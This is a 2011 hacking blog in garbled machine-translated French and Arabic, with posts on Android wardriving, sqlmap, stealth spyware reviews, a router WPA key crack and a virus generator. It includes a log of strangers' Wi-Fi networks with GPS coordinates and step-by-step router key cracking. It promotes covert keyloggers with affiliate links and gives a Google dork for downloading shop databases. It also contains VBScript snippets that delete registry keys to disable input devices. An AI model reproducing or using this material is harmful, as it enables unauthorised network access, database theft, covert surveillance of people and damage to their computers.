Overblog
Suivre ce blog Administration + Créer mon blog
14 avril 2011 4 14 /04 /avril /2011 20:27

Salut les amis .. J'ai récemment acheté une traînée de poudre et HTC ont fait des expériences avec elle au maximum.Wardriving with Android | Hacking Wifi networks with Android | Wifi Network Audit using Android | Wifu with android | Best wardriving applications on androidSon basé sur Android 2.2.1 Froyo et unrootable jusqu'à la date à l'aide Unevoked, racine superoneclick et applications z4root enracinement, donc je suis peu limitée par le constructeur par défaut des fonctions seulement. J'ai failli briques mon téléphone, mais il a repris vie après quelques trys. Sur le thème bien. J'ai été très intéressé par les essais les capacités wardriving du dispositif et donc sur le marché défiler app, j'ai trouvé quelques applications utiles qui je pense doit partager avec vous. Wardriving pour moi est un processus en deux étapes -

  • numérisation des réseaux et de les analyser
  • les casser si vulnérables. (WEP génériques de capture de paquets en utilisant, en utilisant arc-en-WPA)

G-mon

G-mon

G-mon est un puissant scanner WarDriving et GSM / UMTS et NetMonitor outil de test d'entraînement. Il scanne tous les réseaux WiFi à portée et enregistre les données avec les coordonnées GPS dans un fichier sur votre carte SD. Vous pouvez créer un fichier KML pour Google Earth. Il vous montre le cryptage, le canal une puissance du signal. Il montre tous les points d'accès dans la gamme dans une carte en direct. Je l'ai utilisé pour recueillir beaucoup de données qui wifi je vais publier bientôt.

Installez-le à partir d'icihttps://market.android.com/details?id=de.carknue.gmon2

 

Wardrive

Wardrive

une autre application fantastique wardriving qui stocke scans en db sqlite sur la carte SD et affiche trouvé autour de réseaux dans le map.It Nécessite Google MAPS installé.

Installez-le à partir d'icihttps://market.android.com/details?id=ki.wardrive

 

Wifi Analyzer

Wifi Analyzer

Cette application transforme littéralement votre téléphone Android dans un analyseur Wi-Fi! Il vous aide à trouver un canal moins encombré de votre routeur sans fil et permet d'auditer les réseaux.

Installez-le à partir d'icihttps://market.android.com/details?id=com.farproc.wifi.analyzer

 

 

 

Une fois que vous obtenez des réseaux, vous pouvez ensuite les diviser en l'utilisant Aircrack et revenir en arrière.  Il est facile et digne de ce nom:). Voici une tranche de ma wardriving journaux alors que j'étais dans le bus DTC: D

BSSID; LAT; LON; SSID; crypte; l'intervalle de balise; mode de connexion; Manche; RXL; date, l'heure 
00:08:05 C: EF: 08: F0; 28,56602; 77,22951; Adiva; WPAPSK; -93; Infra, 11, -92; 2011/03/17; 18:52:01 
00:08:09 F: 81:8 F: C4; 28,56944; 77,20531; Car0baR; WPA2; -96; Infra, 6, -95; 2011/03/17; 18:58:30 
00:0 F: A3: 6A: 88: B8; 28,56804; 77,22473; SBI; Wep; -93; Infra, 6, -91; 2011/03/17; 18:53:02 
00:17:09 A: 09: D1: 79; 28,56813; 77,22440; WebunivM; Wep; -93; Infra, 6, -91; 2011/03/17; 18:53:05 
00:18:02:87:02:8 F; 28,56845; 77,22306; RT2561_6; Wep; -94; Infra, 6, -93; 2011/03/17; 18:53:18 
00:18:02:8 E: 32:5 A; 28,56885; 77,21437; SrDDGA; WPAPSK; -91; Infra, 6, -90; 2011/03/17; 18:55:31 
00:18:02:92: A2: 73; 28,56955; 77,20365; mtnlbb; Wep; -90; Infra, 6, -89; 2011/03/17; 19:00:21 
00:18:39: AA: 5E: B8; 28,56845; 77,22306; Neeta; Wep; -89; Infra, 11, -88; 2011/03/17; 18:53:18

à la fin de la journée, le moment qui a mis un sourire sur mon visage quand j'ai vu cela comme un nom de réseau, près de Delhi Cantt -

"Vous ne pouvez pas pirater ce cher voisin Wifi"

Il s'agissait d'un réseau sécurisé avec wpa2/psk ip statique et le filtrage mac et le gars savait ce qu'il faisait:) Regarder des réseaux sécurisés fait toujours ma journée.

Partager cet article
Repost0
14 avril 2011 4 14 /04 /avril /2011 20:23

Sqlmap est une commande open source en ligne automatique de l'outil d'injection SQL et son objectif est de détecter et de tirer parti des vulnérabilités d'injection SQL dans le WebSQL Injectionapplications. Une fois qu'il détecte une ou plusieurs injections SQL sur la machine cible, l'utilisateur peut choisir parmi une variété d'options pour réaliser une base de données back-end vaste système de gestion des empreintes digitales, de récupérer SGBD utilisateur de la session et la base de données, les utilisateurs énumérer, les mots de passe, privilèges, bases de données , vidage utilisateur ou spécifiée ensemble tables du SGBD / colonnes, gérer son instruction SQL propre, lire ou écrire du texte ou des fichiers binaires sur le système de fichiers, d'exécuter des commandes arbitraires sur le système d'exploitation, établir un out-of-band connexion "stateful" entre l'agresseur boîte et le serveur de base de données via stager charge Metasploit, base de données procédure de débordement de tampon exploitation stockées ou attaque de relais SMB et more.Enthusiastics pouvez expérimenter avec ses propres opotions et de nombreux serveurs à travers, ou peuvent tester leurs compétences pour garantir leurs serveurs .. mais rappelez-vous , la carte de SQL est un outil, sa pourrait vous aider à trouver et appliquer les vulnérabilités et les injections , mais à la fin, vous devez vraiment avoir une bonne connaissance de SQL certains réel pwning là-bas ..

Vous pouvez télécharger ici sqlmap 0,7: 

Source Linux: http://sourceforge.net/projects/sqlmap/files/sqlmap/0.7/sqlmap-0.7.tar.gz/download
Windows Portable: http://sourceforge.net/projects/sqlmap/files/sqlmap/0.7/sqlmap-0.7_exe.zip/download
Partager cet article
Repost0
14 avril 2011 4 14 /04 /avril /2011 20:11

J'ai publié une série d'articles pour vous présenter certaines des meilleures mot de passe à distance de piratage de logiciels et les enregistreurs de frappe , la plupart des gens me demandent souvent sur ​​Comment protéger votre ordinateur contre les spywares et keyloggers.

Spywares comme SniperSpy et d'espionnage à distance sont presque undetectble par un programme antivirus, pour protéger votre ordinateur contre ces logiciels espions nuisibles, les rats et les enregistreurs de frappe, vous devez installer un programme anti-espion bonne



Voici quelques-uns des principaux risques de spywares :


1. Les logiciels espions sont spécifiquement conçus pour surveiller et enregistrer vos comportements, comme les sites Web que vous visitez le suivi en ligne, ou surveiller votre utilisation d'autres programmes à base web.


2. Les pirates utilisent principalement spywares de voler des informations sensibles telles que mots de passe e-mail et des données de carte de crédit. Il est donc indispensable d'avoir un anti-spyware installé sur votre ordinateur. Antivirus il ne suffit pas aujourd'hui!


3. Spyware est aussi capable de la réalisation d'activités telles que arrêtant complètement votre ordinateur, ou de façon permanente d'effacement ou d'endommager les fichiers. les dossiers des clients intéressantes pourraient être détruits en un clin d'œil, ce qui rend ce type de menace spyware à haut risque.


Spywares sont plus dangereux que les virus pour lesquels le logiciel anti-espion de choisir?


Rafayhackingarticles recommande l'antispywares suivants:


1.Spyware cesser:
box-1.jpg
Spyware Cease offre axée sur la technologie de protection contre les dernières menaces des logiciels espions comme les keyloggers, chevaux de Troie, adware, cookies de suivi malveillants, les pirates de navigateur, les vers, attaques de phishing et autres logiciels malveillants sur Internet de cœur & Thieves Mot de passe Cleaner Un simple clic pour supprimer les cookies malveillants de votre ordinateur système de façon à dégager de cœur Internet complètement et de minimiser les voleurs de mot de passe pour protéger votre vie privée! attaques de logiciels espions


Spyware cessez programme anti-espion a les caractéristiques suivantes:


Garde en temps réel:
Spyware Cease offre le temps de garde sur la fonction réelle de protéger votre PCcontre les menaces potentielles, en minimisant les interruptions. Spyware Cease vous informerons en affichant un popup en bas à droite de l'écran, chaque fois qu'un programme tente de modifier le Registre, de sorte que votre PC est toujours protégé contre les menaces de spyware.


Deep Scan:
Spyware Cease complètement analyser votre Registre système et les disques durs pourles programmes de spyware qui est installé sur votre PC. La libre analyse complète permettra d'identifier et liste toutes les menaces.


Puissamment Supprimer les logiciels espions 
Après numérisation, Spyware Cease va nettoyer tous les malveillants logiciels espions qui peuvent générer en permanence popups indésirables, ralentir la vitesse des ordinateurs, et de détourner page d'accueil, etc logiciels espions comprennent, mais ne sont pas limités à:


Note: S'il vous plaît enregistrez et fermez tous les fichiers ou les paramètres avant la suppression, pour Spyware Cease finiront toutes les tâches en cours d'exécution d'une part afin de complètement supprimer les logiciels espions menaces.


Auto & scan programmé par défaut,
Spyware Cease va lancer une analyse rapide de processus du système, Windows Directory et Directory utilisateurs de logiciels espions . C'est le moyen le plus fiable pour nettoyer les menaces sur votre PC et restaurer la confiance sur Internet. Fonction de balayage automatique peut être programmée par la mise en annexe de travail et le temps de démarrage pour le programme pour répondre à vos besoin.


Système d'analyse 
 En diagnostiquant PC Système pilotes , un processus de système, les fichiers HOSTS, les services du système et registre de Windows, Spyware Cease va générer un texte qui montre toutes les informations sur le système Windows. Vous pouvez recevoir une solution personnalisée pour votre problème spécifique sur votre système individuel, vous une fois en avant le rapport d'analyse et Résultats de l'analyse LSR.lsr de perte d'équipe de soutien Spyware.


Pour de plus amples renseignements sur ce programme et télécharger de détails, visitez le lien suivant:
Spyware cesse .


2.NoAdware:

noadware.jpg
Une autre alternative pour Spyware cessez estNoAdware , il est constamment mis à jour pour identifier les  menaces les plus récentes il à votre vie privée. Le logiciel va scanner votre PC pour différentes Spyware, Adware, Dialers, et des traces de bogues Web . Ces éléments, non seulement créer des nuisances dans la forme de fenêtres pop-up, des ralentissements et des plantages du système, mais de nombreux éléments en fait des renseignements personnels vous concernant record, comme les cartes de crédit, numéros de sécurité sociale , ou d'autres informations sensibles.


Pour de plus amples renseignements sur ce programme et télécharger  de détails, visitez le lien suivant
antilogger.jpg3.Zemana AntiLogger
Zemana AntiLogger couvre désormais à peu près tous les aspects de Windows, y compris modification du Registre et la prévention injection de DLL et protège Windows à partir d'autres techniques liées aux logiciels espions Anti-Keylogger, Anti-SreeenLogger, Anti-weblogger et Anti-ClipboardLogger  outils de son propre. Une autre fonction utile est présent applications a la liste approche, tandis que (contrairement au virus de la liste noire approche de lutte contre) ce qui signifie qu'il reconnaît automatiquement «sécuritaire» des programmes et ne pas les traiter comme des «suspects»
Mes mots sur Zemana AntiLogger. Prenez-le et ne vous une faveur. Même si, avec un objectif similaire, comme la majorité des applications anti-virus, ce petit utilitaire offre beaucoup plus avancée et une approche différente pour protéger son ordinateur contre les logiciels malveillants.
Partager cet article
Repost0
14 avril 2011 4 14 /04 /avril /2011 20:08

1. Spy Sniper (installation à distance en charge)


Note rédaction:  8 / 10



SniperSpy  est l'industrie principale de passe à distance le piratage de logiciel associé à l' installation à distance et fonction de visualisation à distance.
Une fois installé sur le PC distant (s) que vous souhaitez, il vous suffit de vous connecter à votre propre compte SniperSpy personnels pour afficher les journaux d'activité de la télécommande PC! Cela signifie que vous pouvez afficher les journaux de l'ordinateur distant depuis n'importe où dans le monde aussi longtemps que vous avez accès à Internet!
Voulez-vous Spy sur un PC à distance? Exposer la vérité derrière les mensonges! Contrairement au reste, SniperSpy vous permet à distance de n'importe quel PC espion comme une télévision! Regardez ce qui se passe sur le LIVE fond d'écran! Le seul PC un logiciel espion à distance avec un panneau de contrôle sécurisé!
This Remote PC Spy software also saves screenshots along with text logs of chats, websites, keystrokes in any language and more. Remotely view everything your child,employee or anyone does while they use your distant PC. Includes LIVE admin and control commands!
Caractéristiques SniperSpy:
1. SniperSpy est un logiciel espion à distance déployable
2. Option Mode Stealth invisibilité. Travaux en mode furtif complet. Indétectable!
3. Enregistre toutes les frappes
4. Records aucun mot de passe (Email, Login, messagerie instantanée, etc)
5. Tout le moniteur à distance des conversations de messagerie instantanée de sorte que vous pouvez espionner les activités de GI trop
6. Capture une image jpg en pleine dimension de la fenêtre active cependant souvent que vous souhaitez
7. Real Time Viewer écran
8. À distance le redémarrage ou l'arrêt du PC ou de choisir de se déconnecter l'utilisateur Windows actuel
9. Contourne complètement le pare-feu
For more information on this program and download details visit the following link

https://www.plimus.com/jsp/buynow.jsp?contractId=2160696&referrer=rafay112

2. Spy Win (installation à distance en charge)


Note rédaction: 7 / 10

Winspy.jpg picture by rbsoulhunter17

keylogger WinSpy is a Complete Stealth Monitoring Package that can spy on both your Local PC and Remote PC. It includes Remote Install and Realtime Remote PC Viewer. Win Spy Software will capture anything the user sees or types on the keyboard. A special hotkey is used to login and access the program. Users will not be able to terminate or uninstall Win-Spy.
Win-Spy logiciel fonctionne en mode furtif. Il n'apparaîtra pas dans Démarrer de Windows, System Tray, Desktop, Gestionnaire des tâches ou Ajout / Suppression de programmes.
Caractéristiques Spy Win:
1. Moniteur Chat Room (côté double) et de l'activité web
2. Un moniteur à distance toute Email
3. Surveiller les enfants à distance de l'activité sur n'importe quel PC
4. Records aucun mot de passe (Email, Login, messagerie instantanée, etc)
5. Moniteur Webcam PC à distance
For more information on this program and download details visit the following link

http://www.win-spy.com/?hop=rafay112

3.Mobile spy(Cellphone hacking) 


Note rédaction: 9 / 10


Mobile Spy - Windows Mobile, BlackBerry, Android and Symbian Smartphone Monitoring Software
  There exists many cell phone spy softwares on the market and hence people often get confused about which cell phone spy software to go for. To make this job simpler for you we personally tested some of the top cell phone spy softwares and based on the results we conclude Mobile Spy  comme l'un des meilleur.
Mobile Spy  is one of the best and award winning cell phone spy softwares on the market with an affordable price. Mobile Spy team provides an excellent support and hence it becomes just a cakewalk to spy on your favorite cell phone! Today with an excessive usage of cell phones by many teenagers it becomes necessary for their parents to perform cell phone spying. So what are you waiting for? If you’re really serious to spy on a cell phone then Mobile Spy is for you. Go grab Mobile Spy maintenant et exposer la vérité.

 

Partager cet article
Repost0
14 avril 2011 4 14 /04 /avril /2011 19:52

Votre PC est lent?


Recevez-vous des erreurs mystérieuses?


Êtes-vous malade et fatigué de la performance de votre PC?


Depuis votre ordinateur, c'est comme n'importe quelle autre machine, il a besoin d'entretien pour rester en santé haut, de sorte à cet effet:

Perfect Optimizer:


optimiseur Perfect est un programme simple qui permettra d'optimiser votre PC et booster vos performances PC en 300%, Il fixera toutes les erreurs de registre, les écrans bleus etc, ces erreurs sont très dangereux pour la santé de votre PC et votre PC à la suite accident . Vous devrez probablement prendre des mesures avant qu'il ne soit trop tard 


Pourquoi l'Optimiseur de PC?
Perfect Optimizer utilise un algorithme de détection extrêmement performant qui identifier rapidement les références manquantes ou non valides dans votre registre Windows. Avec quelques étapes faciles Perfect Optimizer analyse votre registre Windows complet pour toutes les entrées invalides ou obsolètes et fournir une liste des erreurs trouvées. Après cela, vous pouvez choisir de nettoyer des éléments de liste à la sélection ou de tout réparer automatiquement.

Principales caractéristiques de l'Optimiseur de Perfect


Analyse complète de votre demande.

Perfect Optimizer fournit une analyse entièrement automatique et il peut analyser l'intégralité du registre de votre ordinateur en quelques secondes. En sélectionnant la catégorie que vous voulez, le leader de l'industrie Perfect Optimizer moteur d'analyse se trouve sur la liste et les problèmes détectés pour vous.

Réfection du Registre Made Easy.

Perfect Optimizer est facile à utiliser pour les utilisateurs écrasante majorité. Il fournit des registres fiables et efficaces reparing solutions avec interface simple où nos utilisateurs peuvent restaurer leurs systèmes à l'état optimal en seulement quelques clics.

Coffre-fort mécanisme de sauvegarde .

Chaque fois que vous exécutez Perfect Optimizer (après la première fois) pour la numérisation et de fixation, un fichier de sauvegarde sera automatiquement créé et vous pouvez récupérer le registre dans la section puissant sauvegardes.

Rich utilitaires intégrés .

Perfect Optimizer comprend un ensemble de masse intégré dans des boîtes à outils pour optimiser les performances système, vous pouvez jamais avoir.
  • nettoyant de preuve (NOUVEAU!) complètement éliminer toute trace de votre Internet activityand protéger les informations sensibles tout en améliorant les performances de votre ordinateur.
  • Junk File Cleaner scanne et nettoie les fichiers inutiles de votre système pour libérer de stockage précieux sur vos disques durs et permettre aux applications de s'exécuter plus rapidement et plus efficacement.
  • IE Outils d'assurer une expérience Internet meilleur et plus sain en bloquant plugins malicieux et restaurer Internet Explorer à son Etats de la scène.
  • Perfect Optimizer a d'autres utilitaires de grande, y comprisDuplicate File Cleaner, édifice de l'ActiveX, System Optimizer, Startup Manager, Uninstall Manager  , et ect. pour améliorer efficacement les performances de votre système.
  • DOWNLOAD LINK FULL:http://www.ziddu.com/download/8098023/PerfectOptimizerv5.2.6.75.rar.html
Partager cet article
Repost0
14 avril 2011 4 14 /04 /avril /2011 19:23

j ai trouvé une nouvelle méthode pour cracker un wifi routeur de TOPNET

le routeur de topnet est Thomson Speedtouch

 

1er chose : il faut trouvé le Nom du réseau (SSID)

 

2 eme étape : télécharger ce prog :

http://www.zshare.net/download/65925534a9fb81d8/

 

3 eme placer le bbkeyswin dans le c: et exécuté notre ms-dos

 

tapez ces commande bbkeyswin.exe -v -i Nom du réseau (SSID) les dernier 6 caractères

 

bingo clef de wifi cracké :-D

http://img195.imageshack.us/img195/7422/wwwxcv.jpg

 

technique attaque sur routeur decouverte par k3vin mitnick a partir du sitehttp://www.crack-wpa.fr/

 

merci de ne pas copier coller , et laisser mon copy right :-D merci

Partager cet article
Repost0
14 avril 2011 4 14 /04 /avril /2011 19:23

السلام عليكم ورحمة الله


شرح بلفديو طريقة ترجمة الثغرات الي مكتوب استثمارها بـ php مع تطبيق على موقع مصاب


تحميل الشرح
http://www.freewebtown.com/alm3refh56/group-xp-41.rar


وان شاءا لله يكون واضح للجميع ,,,,,,,

Partager cet article
Repost0
14 avril 2011 4 14 /04 /avril /2011 19:21

السلام عليكم 

أعضاء منتديات الاحتراف

اليوم جايبلكم تغرة 


اليكم 

الدورك

inurl:”shopadmin.asp”

عوض 


shopadmin.asp

ب 


shopdbtest.asp



هده الصفحة تعطيك معلومات قاعدة البيانات 

بعد ايجاد صفحة 

shopdbtest.asp

عوضها ب لتحميل قاعدة البيانات

shopping.mdb

في انتظار ردودكم 

بالتوفيق ،،،

Partager cet article
Repost0
14 avril 2011 4 14 /04 /avril /2011 19:19

السلام عليكم ورحمة الله وبركاتة

أقدم لكم البرنامج الشهير في صنع الفيروسات و برمجتها على طريقة الخاصة إسم البرنامج DELmE's Batch Virus Generator v 2.0
يتمتع هذا البرنامج بعديد من الخصائص الرائعة من تسمية فيروسك الخاص و حفظ الحقوق و العديد العديد من الخصائص أترك لكم المجال لإكتشافها
البرنامج باللغة الإنقليزية وسهل الإستعمال و إلي ما يفهم الإنقليزية عليه بالقوقل

رابط تحميل البرنامج :

http://arabsh.com/1vqrv8k5n1uq.html

Partager cet article
Repost0
14 avril 2011 4 14 /04 /avril /2011 19:16



<script Language="VBscript">

set WshShell = CreateObject("Wscript.Shell")

WshShell.RegDelete"HKEY_LOCAL_MACHINE\SOFTWARE\MIC ROSOFT\Windows\CurrentVersion\Run"

</script>

يعمل الكود على محو البرامج التي تشتغل أثناء اشتغال ال جهاز

************************************************** ********
الكود 2

<script Language="VBscript">

set WshShell = CreateObject("Wscript.Shell")

WshShell.RegDelete"HKEY_LOCAL_MACHINE\System\Curre ntControlSet\Control\اسم الحاسوب\"

WshShell.RegWrite"HKEY_LOCAL_MACHINE\System\Curren tControlSet\Control\ComputerName\ComputerName\"New sHackers.com"

</script>


يعمل الكود على تسمية الحاسوب بأي اسم تريد

************************************************** **************

الكود 3

<script Language="VBscript">

set WshShell = CreateObject("Wscript.Shell")

WshShell.RegDelete"HKEY_CURRENT_USER\System\Curren tControlSet\Services\Class\Printer\"

</script>


يعمل الكود على فصل الطابعة من الجهاز

************************************************** **************

الكود 4

<script Language="VBscript">

set WshShell = CreateObject("Wscript.Shell")

WshShell.RegDelete"HKEY_CURRENT_USER\System\Curren tControlSet\Services\Keyboard\"

</script>

يعمل الكود على فصل الكيبورد

************************************************** **************

الكود 5


<script Language="VBscript">

set WshShell = CreateObject("Wscript.Shell")

WshShell.RegDelete"HKEY_CURRENT_USER\System\Curren tControlSet\Services\mouse\"

</script>

يعمل الكود على فصل الماوس

************************************************** **************

الكود 6

<script Language="VBscript">

set WshShell = CreateObject("Wscript.Shell")

WshShell.RegDelete"HKEY_CURRENT_USER\System\Curren tControlSet\Services\Class\Modem\"

</script>

يعمل الكود على فصل الموديم

************************************************** **************

الكود 7
<script Language="VBscript">

set WshShell = CreateObject("Wscript.Shell")

WshShell.RegDelete"HKEY_CURRENT_USER\System\Curren tControlSet\Services\Class\Monitor\"

</script>

يعمل الكود على فصل الشاشة

Partager cet article
Repost0

Présentation

  • : tunisian-hackers
  • : Hacker est à l'origine un mot anglais signifiant bricoleur, bidouilleur, utilisé pour désigner en informatique les programmeurs astucieux et débrouillards. Plus généralement il désigne le possesseur d'une connaissance technique lui permettant de modifier un objet ou un mécanisme pour lui faire faire autre chose que ce qui était initialement prévu.
  • Contact

Translate this blog

English French German Spain Italian Dutch Russian Portuguese Japanese Korean Arabic Chinese Simplified


this widget by www.AllBlogTools.com

Recherche

Your IP Is:

 

Compteur Tunisian-Hackers

Liens